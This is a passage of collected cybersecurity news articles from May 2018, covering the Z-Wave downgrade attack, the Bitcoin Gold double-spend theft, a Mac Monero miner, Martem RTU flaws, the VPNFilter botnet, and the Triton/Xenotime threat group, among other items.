Will Dormann, vulnerability analyst at CERT/CC and developer of CERT Tapioca, on Thursday announced the release of version 2.0, which introduces a graphical user interface and can be installed on multiple Linux distributions, including Red Hat, CentOS, Fedora, Ubuntu, OpenSUSE, and Raspbian.

CERT Tapioca

CERT Tapioca 2.0 also allows users to set up a HOSTAP-compatible Wi-Fi adapter for wireless connectivity, and it can save results from multiple tested systems.

In addition to checking HTTPS validation, verifying an application’s use of modern cryptography standards, and observing the hosts contacted by an application, Tapioca now allows users to search network traffic for specified strings, such as passwords.

The CERT Tapioca 2.0 source code, along with additional details and usage instructions, are available on GitHub.


100 Million IoT Devices Possibly Exposed to Z-Wave Attack
25.5.2018 securityweek  IoT

Researchers have demonstrated that the Z-Wave wireless communications protocol, which is used by more than 100 million Internet-of-Things (IoT) devices, is vulnerable to security downgrade attacks.

Z-Wave, a protocol primarily used for home automation, uses low-energy radio waves for wireless communications over distances of up to 100 meters (330 feet). Z-Wave was developed by Zensys in 2001 and in 2008 it was acquired by Sigma Designs, which recently sold it to Silicon Labs for $240 million.Z-Wave vulnerable to downgrade attack

According to the Z-Wave Alliance, an organization dedicated to advancing Z-Wave, the protocol is currently used by 700 companies in over 2,400 IoT and smart home products, including thermostats, locks and home monitoring systems.

UK-based Pen Test Partners has conducted an analysis of Z-Wave and discovered that a hacker in range of the targeted devices during the pairing process can launch an attack and crack supposedly secure communications.

Z-Wave vulnerable to downgrade attack

The researchers demonstrated their findings on a Yale smart lock – they showed how an attacker can unlock a door – but the method, which they have dubbed “Z-Shave,” works against any device using Z-Wave.

Z-Wave relies on a shared network key to secure traffic between the controller and the client device when they are paired. The initial version of the pairing process, known as S0, was found to be vulnerable to sniffing attacks back in 2013, which led to the introduction of a more secure process named S2.

The problem with S0 is that it protects the network key with a known encryption key (0000000000000000), allowing an attacker in range of the targeted device to intercept communications. S2 addresses this problem by using stronger encryption, but researchers discovered that an attacker can downgrade the connection from S2 to S0, basically removing the protection.

The hacker needs to be present during the initial pairing process to perform the downgrade, but Pen Test Partners pointed out that the attacker could use a battery-powered hacking device that is left outside the targeted property for an extended period of time, waiting for the pairing process to be initialized.

“The risk is mitigated as one has to be present during the pairing process, but the Z-Wave RF range is significant. We’re investigating whether it might be possible to de-authenticate a Z-Wave client device, but that’s work in progress,” researchers explained.

It turns out that a variant of this downgrade attack was discovered last year by cybersecurity consulting firm SensePost, but the vendor told experts at the time that this was by design and needed for backwards compatibility.

In a blog post published on Wednesday, Silicon Labs assured users that the risk is low and highlighted that it’s not aware of any real-world exploitation.

“While it’s possible that an attacker could intercept the S0 encrypted key exchange frame and decipher it using the hardcoded key, this is only possible during the initial set-up or reinstallation of the device,” Silicon Labs said. “To do this, the attacker would need to be within close proximity of the device during the very moment the device is installed - an extremely small window of opportunity. Furthermore, Z-Wave devices can switch their radio to low power transmission mode during key exchange process to make packet interception attack much more difficult.”

The company added, “It would not be possible to execute an attack without the homeowner becoming aware because they would receive a warning from the S2 controller during the pairing process.”


Bitcoin Gold hit by double-spend attack, exchanges lose over $18 million
25.5.2018 securityaffairs Cryptocurrency

An unknown hacker made over $18 Million worth of BTG (Bitcoin Gold) powering “double spend” attacks on the Bitcoin Gold cryptocurrency network.
The attacks started on May 18, the attacker used a large number of servers that allowed him to take the control of the majority of the Bitcoin Gold’s network hashrate, an attack technique dubbed “51% attack.”

Bitcoin Gold ranks as the 26th-largest cryptocurrency, the overall circulating market cap is $827 million.

Bitcoin Gold director of communications Edward Iskra promptly notified the attacks to the users confirming that a malicious miner was using an exploit to steal funds from cryptocurrency exchanges in double-spend attacks. Iskra explained that the victims of the attack were not the end-users, instead the hacker targeted exchanges.

“An unknown party with access to very large amounts of hashpower is trying to use “51% attacks” to perform “double spend” attacks to steal money from Exchanges. We have been advising all exchanges to increase confirmations and carefully review large deposits.” wrote Edward Iskra, Director of Communications.

“There is no risk to typical users or to existing funds being held. The only parties at risk are those currently accepting large payments directly from the attacker. Exchanges are the primary targets.”

The technique allowed the attacker to control the blockchain and modify transactions making possible to spend the same amount of money two times.

The Bitcoin Gold team explained that due to the high cost of such kind of attack, the only way to make profits was to target exchanges to automatically withdraw a large amount of money.

The attacker monetized its effort by transferring large amounts of BTG coins at exchanges and at the same time sending the same amounts to his wallet.

“The cost of mounting an ongoing attack is high. Because the cost is high, the attacker can only profit if they can quickly get something of high value from a fake deposit,” states Bitcoin Gold team. “A party like an Exchange may accept large deposits automatically, allow the user to trade into a different coin quickly, and then withdraw automatically. This is why they are targeting Exchanges.”

With this attack scheme, the hacker was able to withdraw funds before being discovered.

In the attempt of mitigating the attacks, exchanges have raised the threshold needed to confirm a transaction.

“Requiring more confirmations greatly increases safety. Until now, some Exchanges were operating with less than five confirmations required. We have been urging higher limits to prevent such an attack, and urging manual review of large deposits of BTG before clearing the funds for trading.” continues the advisory published by Bitcoin Gold.

“It appears that actions on the part of the exchanges have deterred the attacker, for now.”

The Bitcoin Gold team was able to follow the stolen funds from exchanges to the BTG address GTNjvCGssb2rbLnDV1xxsHmunQdvXnY2Ft, the hacker transferred more than 388,000 BTG coins (roughly $18 million).

BTG double-spend

Even if users are not affected, the attacks could have severe consequences on the exchanges that could end in bankrupt.

According to one of the exchanges involved in the attacks, the mysterious attacker is the same actor that attempted a double-spend attack on the original Bitcoin network in the past.

“One of the targeted Exchanges reported that they strongly believe this attacker attempted to hit them with a double-spend of BTC in the past. In their words, “we are 100% sure that it is the same person, we found many associations between the accounts.” concluded Iskra.


Many users reported in the past few weeks their Macs have been infected with a new Monero Miner
25.5.2018 securityaffairs Cryptocurrency

In the past weeks, many Mac users have been infected with a new strain of Monero miner, the infections confirm the rise of this kind of malware.
According to researchers at Malwarebytes, many Mac users in the past weeks have been infected with a new strain of Monero miner. The owners of the infected Mac systems noticed the presence of a process named “mshelper” had been consuming a lot of CPU power and draining their batteries.

“The malware became public knowledge in a post on Apple’s discussion forums, where the “mshelper” process was found to be the culprit. Digging deeper, it was discovered that there were a couple other suspicious processes installed as well. We went searching and found copies of these files.” reads the analysis published by MalwareBytes.

“The malware is mining for Monero cryptocurrency. Here’s a breakdown of its components.”

Monero Miner

The Mac malware is likely installed by a fake Adobe Flash Player installers, through the downloading from piracy websites, or bait documents specially crafted to trick victims into opening them.

According to the experts, the launcher, the pplauncher file, is kept active by a launch daemon (com.pplauncher.plist), a circumstance that suggests that the dropper had root privileges. The launcher was developed in Golang, it has a relatively large executable file (3.5 Mb).

“Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs.” continues the analysis published by Malwarebytes.

The launcher creates the miner process mshelper which is installed in the following location:

/tmp/mshelper/mshelper
The miner is an older version of the legitimate and open source mining tool named XMRig.

This malware is not particularly dangerous, but in case the infected system has a problem such as damaged fans or dust-clogged vents it could cause overheating.

“Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware,” concludes Malwarebytes.

“This malware follows other cryptominers for macOS, such as Pwnet, CpuMeaner, and CreativeUpdate. I’d rather be infected with a cryptominer than some other kind of malware, but that doesn’t make it a good thing.”

Users can manually remove the malware by deleting these two files and rebooting their devices:

/Library/LaunchDaemons/com.pplauncher.plist
/Library/Application Support/pplauncher/pplauncher


Macs Infected With New Monero-Mining Malware
24.5.2018 securityweek  Cryptocurrency

Many Mac users reported in the past few weeks that a process named “mshelper” had been eating up a lot of CPU power and draining their batteries. It turns out that the process is associated with a piece of malware designed to mine for Monero (XMR) cryptocurrency.

Researchers at Malwarebytes have analyzed the mshelper malware and while they haven’t been able to precisely determine how it’s distributed, they believe fake Flash Player installers, malicious documents or pirated software are likely involved rather than some other, more sophisticated, method.

Experts noticed that the launcher, a file named pplauncher, is kept active by a launch daemon (com.pplauncher.plist), which suggests that the dropper likely had root privileges on the compromised system. The launcher was developed in Golang and it’s relatively large (3.5 Mb).

“Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs,” explained Malwarebytes’ Thomas Reed.

Once the launcher creates the mshelper process, the compromised device starts mining for Monero cryptocurrency on behalf of the cybercriminals who distribute the malware. The miner itself is a legitimate and open source mining tool named XMRig.

“This malware is not particularly dangerous, unless your Mac has a problem like damaged fans or dust-clogged vents that could cause overheating. Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware,” Reed said.

Based on reports from victims, anti-malware products initially either did not detect the threat at all or they could not completely remove the infection – the malware reappeared after a reboot. Now that news of the malware has spread, security companies have likely updated their products to ensure complete removal.

Alternatively, users can manually remove the malware by deleting these two files and rebooting their devices:

/Library/LaunchDaemons/com.pplauncher.plist

/Library/Application Support/pplauncher/pplauncher

This is not the only cryptocurrency miner delivered recently to Mac users. In February, Malwarebytes reported that a Monero miner had been delivered through malicious versions of applications available through the MacUpdate website.


Vulnerabilities Found in RTUs Used by European Energy Firms
24.5.2018 securityweek 
Vulnerebility

Several critical and high severity vulnerabilities have been found in remote terminal unit (RTU) modules designed for the energy sector and used in various European countries.

Bernhards Blumbergs and Arturs Danilevics of Latvia’s CERT.LV discovered that Telem-GW6 and Telem-GWM products made by Estonia-based Martem are affected by vulnerabilities that can be exploited to cause a denial-of-service (DoS) condition and execute arbitrary code and commands.

Martem, which specializes in telecontrol systems for supervising and controlling electrical distribution networks, says its clients are electrical distribution firms, and industrial and transportation companies that have their own electrical networks. Martem’s main customers are located in Estonia, Lithuania, Latvia and Finland.Vulnerabilities found in Martem RTUs

The company said its RTUs were used earlier this year in a cyber defense exercise organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE).

The vulnerable products are data concentrators that collect data from peripheral devices in the substation. The RTUs impacted by the security holes found by Blumbergs and Danilevics are GW6 version 2018.04.18-linux_4-01-601cb47 and prior, and GWM version 2018.04.18-linux_4-01-601cb47 and prior.

The most serious of the flaws, with a CVSS score of 10, is CVE-2018-10603, which allows a rogue node on the network to send unauthorized commands and take control of the industrial process. The vulnerability is caused by the lack of authentication for commands using IEC-104, a protocol standard for telecontrol, teleprotection and telecommunications for electric power systems.

Another security hole, rated “high severity” and tracked as CVE-2018-10607, has been classified as an uncontrolled resource consumption issue. According to ICS-CERT, a DoS condition can be caused within the industrial process control channel by creating new connections to one or more input/output accessories (IOAs) and not closing them properly.

Vulnerabilities found in Martem RTUs

The last vulnerability, tracked as CVE-2018-10609 and also classified as “high severity,” is a cross-site scripting (XSS) bug that can be exploited to execute arbitrary code on the client side with the privileges of the targeted user.

According to ICS-CERT, the vulnerabilities can be exploited remotely even by an attacker with a low skill level.

The vendor says the XSS flaw will be patched with the release of firmware version 2.0.73, which is expected to become available sometime after May 23. Attacks can also be prevented by disabling the web server if it’s not needed, or protecting the web server with a strong password to avoid unauthorized access.

The other two vulnerabilities can be mitigated through configuration changes, including using VPNs, using a firewall for packet filtering, and configuring the RTU so that only trusted systems can send commands.


Senator Asks DoD to Secure Its Websites
24.5.2018 securityweek BigBrothers

Senator Ron Wyden (D-Ore.) on Tuesday asked the chief information officer at the U.S. Department of Defense (DoD) to take immediate action to ensure that the organization’s websites use HTTPS.

The senator noted that some of the DoD’s websites, such as the ones belonging to the NSA, the Army and the Air Force, do use HTTPS by default and certificates trusted by major web browsers, but many other sites either don’t use HTTPS at all or they rely on digital certificates issued by the DoD Root Certificate Authority. Certificates issued by the DoD itself trigger security warnings in browsers.

The list of websites that do not use HTTPS includes the ones of the Navy, Marines, and even the CIO’s official website hosted at dodcio.defense.gov.

Sen. Wyden believes the security warnings displayed for HTTP sites will “erode the public’s trust in the Department and its ability to defend against sophisticated cyber threats” and “actively degrade the public’s security by teaching users to treat security warnings as irrelevant.”

The lawmaker has pointed out that memo M-15-13 issued by the Office of Management and Budget (OMB) in 2015 requires all federal agencies to secure their websites by enabling HTTPS and enforcing HSTS. Furthermore, a Binding Operational Directive issued last year by the Department of Homeland Security (DHS) requires all agencies to start using web and email security technologies such as HTTPS, DMARC and STARTTLS.

The senator also noted in his letter that Google’s Chrome web browser will soon start marking HTTP pages with a red “Not Secure” warning.

The CIO of the DoD, Dana Deasy, has been instructed to direct all agencies to enable HTTPS with HSTS on all public web services, obtain and deploy certificates trusted by major browsers, and evaluate the use of shorter-lived certificates such as the ones offered by Let’s Encrypt. An action plan and progress report must be provided by the DoD by July 20.

The senator is well regarded by many in the cybersecurity industry for his initiatives. One of his advisers in privacy researcher and activist Christopher Soghoian, formerly principal technologist at the American Civil Liberties Union.


Massive Russia-Linked Botnet Raises Concerns of New Attack on Ukraine
24.5.2018 securityweek  BotNet

Russia-made VPNFilter malware infects 500,000 devices in preparation of new Ukraine attack

Russia may be preparing for another massive cyberattack on Ukraine using a botnet of at least 500,000 compromised routers and network-attached storage (NAS) devices, Cisco’s Talos threat intelligence group reported on Wednesday.

The botnet is powered by a sophisticated piece of malware that researchers have dubbed VPNFilter based on the names of some folders created by the threat. Talos has worked with several other cybersecurity firms and law enforcement agencies to investigate VPNFilter. While the investigation is ongoing, an initial report has been published due to concerns that an attack involving the botnet may be imminent.

Researchers believe a state-sponsored or state-affiliated threat actor is likely behind the attack and Russia has been named the main suspect due to code overlaps with the BlackEnergy malware, which has been attributed by many to the Kremlin.

More than 500,000 hacked devices have been observed across 54 countries, but many infections have been spotted in Ukraine and their number continues to increase. The malware has compromised devices made by Linksys, MikroTik, Netgear, TP-Link and QNAP, and while experts have yet to identify the attack vector they are confident that no zero-day vulnerabilities are involved.

VPNFilter is a modular piece of malware that has a wide range of capabilities. It can intercept data passing through the compromised device, including website credentials, and it can monitor the network for communications over the Modbus SCADA protocol. The malware, which uses Tor to communicate with a control panel, also has destructive capabilities that can be leveraged to make an infected device unusable.

“The destructive capability particularly concerns us. This shows that the actor is willing to burn users' devices to cover up their tracks, going much further than simply removing traces of the malware. If it suited their goals, this command could be executed on a broad scale, potentially rendering hundreds of thousands of devices unusable, disabling internet access for hundreds of thousands of victims worldwide or in a focused region where it suited the actor's purposes,” Talos said in its report.

Researchers are concerned that VPNFilter may be used for another massive attack on Ukraine not only due to the large number of infections and a separate command and control (C&C) infrastructure for devices in this country, but also because there are only a few weeks until Ukraine celebrates its Constitution Day.

Last year, the NotPetya wiper attack was launched on the eve of Ukraine’s Constitution Day. NotPetya has been officially attributed to Russia by the U.S. and other countries and researchers have also linked the malware to BlackEnergy.

The fact that the malware monitors Modbus communications, which are typically used for supervisory control and data acquisition (SCADA) systems, suggests that the attacker may also be targeting industrial control systems (ICS).

Threat groups believed to be working for the Russian government have been known to launch attacks on ICS, including on Ukraine’s energy sector back in December 2016 using a piece of malware tracked as Industroyer and CRASHOVERRIDE. There are several other Russia-linked actors that have targeted industrial systems, including Dragonfly and Dymalloy.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor's operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos said.


Agari Employs Active Defense to Probe Nigerian Email Scammers
24.5.2018 securityweek 
Phishing

Agari, a firm that offers protection against email-borne threats, has spent the last 10 months analyzing the targets, tactics and identities of 10 separate criminal organizations. All ten organizations concentrate on email scam attacks; and nine of the ten are located in Nigeria.

While this does not prove that 90% of email scams come out of Nigeria, it is probably fair to say that Nigeria dominates this vector. The organizations were originally selected via scam emails targeted at Agari customers and blocked by Agari software. But Agari's analysis is far more than just an investigation into known scamware.

Chief scientist Markus Jakobsson told SecurityWeek that he and his team developed a method of gaining access to the scammers' own mailboxes, using what he describes as responsible active defense. The responsible element includes gaining FBI 'acquiescence' on the project. It is described as 'active defense' because it falls short of 'hacking back'. "You could describe it," he told SecurityWeek, "as a process of socially engineering the social engineers."

During the course of the project using this methodology, he and his team captured 78 criminal email accounts belonging to 10 different criminal organizations and containing 59,652 unique emails. In a report (PDF) published Tuesday, Agari was able to analyze the process and progress of email scams rather than just the content of individual scam emails.

Just like cybercriminals globally, the Nigerian scammers are becoming more sophisticated (using, for example, persistent and stealthy malware to penetrate organizations' email accounts), and are beginning to direct their attention against commercial organizations rather than individual computer users. As elsewhere, 'profit' is the motive: business email compromise (BEC) attacks require less individual effort for a much higher return.

Agari's research shows that the average BEC incident nets $35,000 for the criminals. 3.97% of people who answer a BEC email become victims -- and 24% of all email scams are now BEC. In June 2017, the FBI reported that the total worldwide dollar loss to BEC scams was in the region of $5.3 billion.

BEC works by the scammer masquerading as the company president or CEO, and requesting that Finance should send an urgent payment to a customer or business partner. The figures show that it is remarkably successful. But despite its success and despite the higher returns on effort, it is not the most frequent scam. That remains -- from the same criminal organizations -- the romance scam.

This is a primary method, along with work-from-home scams, used to recruit the money mules needed to get money out of the country (asking Finance to wire money direct to Nigeria or China or the Philippines would probably fail at the first hurdle). "Recruiting money mules is a full-time effort for each of the groups we captured. As the scammer groups are typically based overseas, a successful scamming operation is entirely dependent on money transfer techniques that evade suspicion."

Typically, a romance scam works by first making contact through a dating website. As soon as possible, the conversation is moved to a separate communications channel, and the scammer starts to ask for small sums of money to help with some contrived hardship. "Once the victim starts complaining about money, offer them a way to get all of their money back by simply cashing a couple of checks and sending part of the money to the scammer via MoneyGram or Western Union."

Once this happens, the romance victim becomes susceptible to blackmail and a money mule (or money launderer) has been recruited. Money scammed from other victims is not wired directly abroad, but wired to the local mule's bank account, and from there on to its overseas destination.

The details of such scams -- and many more categories are discussed in the Agari report -- are already well-understood. What is new, however, is Agari's ability to monitor the captured criminal email accounts over time and see the scam unfolding; both the scammers' requests and the victims' replies.

On several occasions Agari was able to step in and warn the victim. In November 2017, for example, it warned 5 real estate firms that their email had been compromised. In April 2018, "an Agari researcher identified [a] BEC attack and was able to warn the accounts payable team just in time to reverse the wire payment. The response from the victim was a condemnation of the attacker using words too colorful to print."

The Agari project is an example of the growing determination of cyber defenders to stop being entirely reactive to threats, and to begin an offensive against the attackers. It is an excellent example of the potential of the concept of active defense. Not only was Agari able to disrupt criminal activity, capture of the criminals' email accounts enabled them to identify many of the individual criminals.

"In close partnership with law enforcement, our customers and our partners, "says the report, "Agari will continue to capture and report identity-based attacks and help turn the tide of online crime."

Agari raised $22 million Series D funding in May 2016, bringing the total raised by the company to $44.7 million.


Okta Adds Threat Intel to Network Context to Eliminate Passwords
24.5.2018 securityweek  Safety

Okta Unveils Adaptive Single Sign-On and Enhanced Adaptive Multi-Factor Authentication Products

The adequacy of passwords as a security defense has long been discussed and criticized. The 2017 Verizon Data Breach Investigation Report (DBIR) reported that 81% of hacking-related breaches involve stolen or compromised user credentials -- and yet there is no generally accepted alternative. Multi-factor user authentication -- which requires an additional user token or biometric -- helps, but does not solve the problem.

With traditional approaches there is a simple contradiction: the more security that is applied to user authentication, the greater the disruption (known as 'friction') imposed on user workflows. When companies strive for a seamless user experience, for both their customers and their workforce, this is a problem. "For companies trying to deliver seamless and secure user-experiences, passwords are a real pain," explained Joe Diamond, director of security product marketing management at Okta, in a blog post. "Either they're complex -- and therefore difficult for employees and customers to remember -- or they're prime targets for nefarious hackers."

In recent years there has been a growing development and acceptance of additional passive authentication factors to improve security without disrupting the user. Passive in this sense simply means that the authentication is automatically taken without user involvement.

One of the most important passive factors is context, and identity companies are increasingly incorporating contextual factors such as user location (IP address), time (is it reasonable for this user to want access at this time?), and destination (does this user likely or commonly need access to these files?) to bolster the initial password authentication. But notice the much-decried password is still necessary.

Okta, which provides identity systems for corporations, has a device trust model to enhance the security of remote logins. It uses, for example, Exchange ActiveSync certificates to prevent unmanaged devices from accessing Office 365. Today, however, it has announced the addition of a new context factor that it believes will largely enable the elimination of passwords: ThreatInsight.

ThreatInsight is based on the understanding of threats and suspicious activity seen by Okta's incident response team across the company ecosphere of 4,350 customers and 5,500 partners in the Okta Integration Network.

"By blending context signals with this intelligence," writes Diamond, "Okta's Adaptive MFA solution will be able to more effectively provide businesses with the seamless, simple authentication experience that companies have grown to depend on. We've also introduced Adaptive Single Sign-on (SSO), which provides a simple, secure authentication experience for users and integrates with third-party enterprise mobility management solutions, such as Airwatch or MobileIron, for device trust. With this combination of Adaptive SSO, MFA, and ThreatInsight, IT and app development teams can move toward a context-driven security approach -- one that may eventually eliminate passwords after all."

"The best password is no password at all," adds Todd McKinnon, CEO and co-founder of Okta. "Over the past few years, we've invested heavily in new security technologies that provide the right level of protection for the many apps and services an organization uses today, which can vary by company, by app, by user, and by scenario. Now we're using both those signals across a user's login context as well as insight from across our ecosystem to improve an organization's ability to set stronger access controls and make faster, more intelligent decisions when there may be a concern -- and allow companies to replace the password with stronger, simpler authentication."

By combining all the different contextual factors, the Okta Adaptive MFA product is able to make dynamic access decisions. It can determine between low risk access requests and high-risk access requests; and only require traditional authentication measures such as a password if the risk level requires it.

For example, a user attempting authentication from a recognized IP address from a known managed device, it could be considered low risk and allowed without the necessity for a password.

If the authentication request comes from a known but unmanaged device in a new location, it could be considered moderate risk. The user would be prompted with security question and asked to prevent a second factor.

If the user attempts to authenticate from an unmanaged and unknown device and from a connection with a high threat level, the user would be considered ‘high risk' and Okta would disallow access.

Banks provide an example of the problem with password authentication. Banks by their nature require strong authentication, which is not provided by passwords alone. But they also require user-friendly authentication (for fear of losing customers), which is not provided by standard multi-factor solutions. The National Bank of Canada believes it has found the right compromise with Okta.

"National Bank of Canada services millions of clients in hundreds of branches across Canada. As an organization, we have clear objectives, one of which is to simplify the customer experience," said Alain Goffi, vice president, IT Infrastructures at National Bank of Canada. "Okta's smart authentication and contextual capabilities enable us to give our clients a seamless, secure online experience."

Okta's ThreatInsight is scheduled to be available during the second half of this year.


GRIMM Opens Security Research Lab for ICS, Connected Vehicles
24.5.2018 securityweek  ICS

Cybersecurity research and engineering firm GRIMM has opened a new Grand Rapids, MI-based cybersecurity research lab. GRIMM provides security consulting, engineering and research services, including vulnerability research/testing and security training, to both government agencies and private sector enterprises.

The new lab will enable the company to work closely on cybersecurity initiatives within the advanced manufacturing, aerospace, automobility and defense industries based in the region; and in particular it is designed to engage with companies in the automotive and aviation industries, including OEMs. It will major on the embedded (IoT) devices integral to the industrial control systems of these industries.

"Practically every new vehicle has connected or autonomous components and smart city technologies are being deployed into urban infrastructure on a regular basis. The realities of the Internet of Everything means that distributed systems, from industrial control systems to aerospace manufacturing operations and everything in between, must have security measures embedded or run the risk of exposing countless enterprises, systems and users to vulnerabilities," said Brian DeMuth, GRIMM CEO. "GRIMM's Michigan lab will enable our team of researchers and security experts to become more deeply embedded into the critical industries -- automobility, aerospace, defense and manufacturing -- that support these advanced technologies."

Connected cars are a case in point. "By 2020, there will be a quarter billion connected vehicles on the road, enabling new in-vehicle services and automated driving capabilities, according to Gartner, Inc. During the next five years, the proportion of new vehicles equipped with this capability will increase dramatically, making connected cars a major element of the Internet of Things (IoT)." (Gartner) By 2020, one in five vehicles on the road worldwide will have some form of wireless network connection.

But the rush to connectivity is introducing serious security concerns. GRIMM's new cybersecurity research facility will focus on embedded systems engineering to support its current car hacking initiatives and cyber research in the automobility and aerospace sectors. In the last month automobile vulnerabilities have included a bug in a misconfigured server run by Calamp that would allow attackers to track the vehicle's locations, steal user information, and even cut the engine.

Earlier this month it was announced that some Volkswagen vehicles could be remotely hacked by an undisclosed vulnerability that would enable attackers to control the on-board microphone to listen in on the driver and passengers, access the system's address book and history while introducing the possibility of tracking the car via its navigation system.

Just yesterday, it was announced that Chinese researchers from Keen Security Lab had discovered more than a dozen locally and remotely exploitable flaws in certain BMW cars.

"Yesterday's disclosure that a number of BMW vehicles are susceptible to a range of cyber vulnerabilities highlights that as we continue to add more connected and autonomous capabilities into vehicles, the surface area to secure becomes exponentially larger," Bryson Bort, GRIMM chairman and founder told SecurityWeek. "This is precisely why GRIMM is announcing the opening of its dedicated cybersecurity lab in Michigan where it will work closely on initiatives within the advanced manufacturing, auto and defense industries based in the region. It will enable GRIMM to work more closely with original equipment manufacturers, suppliers, and other stakeholders in the automobility sector and beyond to improve the holistic security of automotive, aviation, and industrial control systems to address the challenges of cybersecurity in these fields."


U.S. Disrupts Russian Botnet of 500,000 Hacked Routers
24.5.2018 securityweek  BotNet

The US Justice Department said Wednesday that it had seized an internet domain that directed a dangerous botnet of a half-million infected home and office network routers, controlled by hackers believed tied to Russian intelligence.

The move was aimed at breaking up an operation deeply embedded in small and medium-sized computer networks that could allow the hackers to take control of computers as well as easily steal data.

The Justice Department said the "VPNFilter" botnet was set up by a hacking group variously called APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group.

The group is blamed for cyber attacks on numerous governments, key infrastructure industries like power grids, the Organization for Security and Co-operation in Europe, the World Anti-Doping Agency, and other bodies.

US intelligence agencies also say it was involved in the operation to hack and release damaging information on the Democratic Party during the 2016 US presidential election, and has engineered a number of computer network disruptions in Ukraine.

"According to cybersecurity researchers, the Sofacy Group is a cyber-espionage group believed to have originated from Russia," the Department of Justice said in a court filing.

"Likely operating since 2007, the group is known to typically target government, military, security organizations, and other targets of intelligence value, through a variety of means," it said.

The Justice filing did not say who was behind Sofacy Group, but US intelligence has in the past linked it to Russia's GRU military intelligence agency, and numerous private computer security groups have made the same connection.

In Wednesday's action, the Justice Department said it had obtained a warrant authorizing the FBI to seize a computer domain that is part of the command and control system of the VPNFilter botnet.

The botnet targets home and office routers, through which it can relay orders from the botnet's controllers and intercept and reroute traffic back to them, virtually undetected by the users of a network.

In a report released in parallel to the Justice announcement, network equipment giant Cisco said VPNFilter had infected at least 500,000 devices in at least 54 countries.

It has targeted popular router brands like Linksys, MikroTik, NETGEAR and TP-Link.

"The behavior of this malware on networking equipment is particularly concerning, as components of the VPNFilter malware allows for theft of website credentials," Cisco said.

It also has "a destructive capacity that can render an infected device unusable, which can be triggered on individual victim machines or en masse."

Both Justice and Cisco said they were releasing details of the problem before having found a strong, permanent fix. Justice said that by seizing control of one of the domains involved in running VNPFilter, it will give owners of infected routers a chance to reboot them, forcing them to begin communicating with the now-neutralized command domain.

The vulnerability will remain, Justice said, but the move will allow them more time to identify and intervene in other parts of the network.


Hackers Behind 'Triton' Malware Attack Expand Targets
24.5.2018 securityweek 
Virus

The threat group responsible for the recently uncovered attack involving a piece of malware known as Triton, Trisis and HatMan is still active, targeting organizations worldwide and safety systems other than Schneider Electric’s Triconex.

The actor, which industrial cybersecurity firm Dragos tracks as Xenotime, is believed to have been around since at least 2014, but its activities were only discovered in 2017 after it targeted a critical infrastructure organization in the Middle East.

The attack that led to the cybersecurity industry uncovering Xenotime was reportedly aimed at an oil and gas plant in Saudi Arabia. It specifically targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability.Xenotime hackers behind Triton/Trisis attack

The targeted organization launched an investigation and called in third-party experts, including Dragos and FireEye, after the SIS caused some industrial systems to unexpectedly shut down. Researchers believe the shutdown was caused by the attackers by accident.

Dragos continues to analyze the initial Triton/Trisis incident and more recent attacks launched by Xenotime. The company says the group has targeted organizations globally, far outside the Middle East.

The security firm has not shared any details on present attacks, but it did note that the hackers are active in multiple facilities, targeting safety controllers other than Triconex.

Xenotime hackers behind Triton/Trisis attack

Some researchers believe Iran is behind the attacks, but Dragos has not shared any information on attribution. The company did point out that it has not found any links between Xenotime and other known groups.

“Dragos assesses with moderate confidence that Xenotime intends to establish required access and capability to cause a potential future disruptive or even destructive event,” the company wrote in a blog post. “Compromising safety systems provides little value outside of disrupting operations. The group created a custom malware framework and tailormade credential gathering tools, but an apparent misconfiguration prevented the attack from executing properly. As Xenotime matures, it is less likely that the group will make this mistake in the future.”

Dragos has been tracking the activities of several threat actors that target industrial control systems (ICS). The company has published brief reports for three of the seven hacker groups it monitors, including the Russia-linked Allanite, which targets electric utilities in the US and UK, and Iran-linked Chrysene, which has attacked ICS networks in the Middle East and the UK.


Malwarebytes Acquires Binisoft to Enhance Endpoint Protection Platform
24.5.2018 securityweek  Safety

Malwarebytes announced this week the acquisition of Binisoft in an effort to help the company enhance its endpoint protection platform and expand its global footprint. Terms of the deal have not been disclosed.

Romania-based Binisoft is the brainchild of Alexandru Dicu, who in 2010 decided to create Windows Firewall Control, a tool designed to make it easier to manage the firewall built into Windows.

Over the past years, Windows Firewall Control has become a powerful and highly popular tool used by millions of people. It allows users to quickly access frequently needed options of the Windows Firewall.

Binisoft has also developed USB Flash Drives Control, a small and powerful utility designed for controlling how USB removable drives are used on a device. For example, users can prevent read and write operations, or they can block any executable file on a flash drive from running.

Malwarebytes plans on integrating Windows Firewall Control into its endpoint protection platform, which provides broad visibility into endpoints on a network and simplifies the deployment and management of security solutions.

“We’ve seen tremendous demand from our customer base for these capabilities,” said Marcin Kleczynski, CEO of Malwarebytes. “With continued increases in cyberthreats, including malware that communicates and coordinates data theft, it is more important than ever for businesses to easily manage their Windows Firewall and establish communication policies to prevent programs from initiating unauthorized outbound connections. With the acquisition of Binisoft, Malwarebytes will provide an all in one solution well beyond having to manage a Firewall through Group Policy Objects or other Microsoft technologies.”

Windows Firewall Control has been distributed under a donationware licensing model, while USB Flash Drives Control has been offered as freeware. Malwarebytes has promised to continue maintaining and supporting Binisoft products, and offer them for free, at least in the short term.


Xenotime, Threat actors Behind Triton Malware broadens its activities
24.5.2018 securityaffairs
Virus

The threat actor behind the Triton malware (aka Trisis, Xenotime, and HatMan) is now targeting organizations worldwide and safety systems.
The attackers are expanding their targets and new variants are able to attacks also other than Schneider Electric’s Triconex systems.

The malware was first spotted in December 2017 by researchers at FireEye that discovered that it was specifically designed to target industrial control systems (ICS) system.

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

Triton malware

The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.

